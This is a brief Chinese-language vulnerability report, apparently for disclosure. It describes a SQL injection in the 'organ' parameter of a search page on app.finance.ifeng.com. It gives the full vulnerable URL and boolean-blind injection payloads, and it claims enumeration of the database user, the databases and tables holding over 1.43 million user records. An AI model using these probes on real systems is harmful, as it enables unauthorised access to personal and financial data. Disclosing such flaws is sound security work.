目标:app.finance.ifeng.com
检测发现以下地方存在SQL注入:(注入参数organ,布尔盲注/union query)
http://app.finance.ifeng.com/wgsearch/index.php?code=600234&begin=2016-03-05&end=2016-05-31&organ=中国证券监督管理委员会
Payload:
organ=中国证券监督管理委员会' and 'a'='a
organ=中国证券监督管理委员会' and 'a'='b
1、当前数据库用户
2、所有数据库
3、数据表,涉及143W+用户信息/大量财务数据,仅以行数作证,具体就不深入了
解决方案:
请多指教~